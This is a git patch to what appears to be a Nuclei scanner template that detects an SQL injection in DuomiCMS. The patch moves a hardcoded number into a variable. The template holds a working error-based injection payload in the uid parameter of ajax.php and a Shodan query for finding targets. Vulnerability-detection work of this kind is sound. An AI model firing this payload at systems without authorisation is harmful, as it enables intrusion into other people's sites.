From 8ab77083cc7bdb2451798170e9df9916cb61fd5f Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 30 Jun 2022 08:18:22 +0530
Subject: [PATCH] Update duomicms-sql-injection.yaml

---
 vulnerabilities/other/duomicms-sql-injection.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml
index 14c2fbac66..e0cc88e1aa 100644
--- a/vulnerabilities/other/duomicms-sql-injection.yaml
+++ b/vulnerabilities/other/duomicms-sql-injection.yaml
@@ -10,17 +10,20 @@ info:
     verified: true
     shodan-query: title:"DuomiCMS"
   tags: duomicms,sqli
+  
+variables:
+  num: "999999999"
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
+      - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '{{md5(9999999999)}}'
+          - '{{md5({{num}})}}'
 
       - type: status
         status: